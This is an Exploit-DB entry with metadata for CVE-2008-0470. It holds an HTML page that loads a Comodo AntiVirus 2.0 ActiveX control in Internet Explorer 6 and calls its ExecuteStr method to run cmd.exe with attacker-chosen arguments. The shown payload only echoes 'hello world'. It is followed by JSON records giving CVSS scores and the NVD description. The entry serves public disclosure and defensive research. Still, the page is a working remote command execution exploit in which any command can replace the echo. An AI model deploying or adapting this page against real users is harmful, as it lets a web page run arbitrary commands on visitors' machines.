ID EDB-ID:4974
Type exploitdb
Reporter h07
Modified 2008-01-23T00:00:00
Description
Comodo AntiVirus 2.0 ExecuteStr() Remote Command Execution Exploit. CVE-2008-0470. Remote exploit for windows platform
<!--
Comodo AntiVirus 2.0 ExecuteStr() 0day Remote Command Execution Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Tested on:..
- Comodo AntiVirus Beta 2.0
- Microsoft Internet Explorer 6
Just for fun ;)
-->
<html>
<object id="obj" classid="clsid:309F674D-E4D3-46BD-B9E2-ED7DFD7FD176"></object>
<script>
obj.ExecuteStr('cmd.exe', '/C echo "hello world" && pause');
</script>
</html>
# milw0rm.com [2008-01-23]
{"id": "EDB-ID:4974", "hash": "a151faf3a4b56fde603bd76d84874881", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Comodo AntiVirus 2.0 ExecuteStr Remote Command Execution Exploit", "description": "Comodo AntiVirus 2.0 ExecuteStr() Remote Command Execution Exploit. CVE-2008-0470. Remote exploit for windows platform", "published": "2008-01-23T00:00:00", "modified": "2008-01-23T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/4974/", "reporter": "h07", "references": [], "cvelist": ["CVE-2008-0470"], "lastseen": "2016-01-31T22:14:09", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 10.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-0470"]}], "modified": "2016-01-31T22:14:09"}, "vulnersScore": 10.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4974/", "sourceData": "<!--\nComodo AntiVirus 2.0 ExecuteStr() 0day Remote Command Execution Exploit\nBug discovered by Krystian Kloskowski (h07) <h07@interia.pl>\nTested on:..\n- Comodo AntiVirus Beta 2.0\n- Microsoft Internet Explorer 6\nJust for fun ;) \n-->\n\n<html>\n<object id=\"obj\" classid=\"clsid:309F674D-E4D3-46BD-B9E2-ED7DFD7FD176\"></object>\n\n<script>\nobj.ExecuteStr('cmd.exe', '/C echo \"hello world\" && pause');\n</script>\n\n</html>\n\n# milw0rm.com [2008-01-23]\n", "osvdbidlist": ["40921"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-09-29T14:25:44", "bulletinFamily": "NVD", "description": "A certain ActiveX control in Comodo AntiVirus 2.0 allows remote attackers to execute arbitrary commands via the ExecuteStr method.", "modified": "2017-09-28T21:30:18", "published": "2008-01-29T15:00:00", "id": "CVE-2008-0470", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0470", "title": "CVE-2008-0470", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
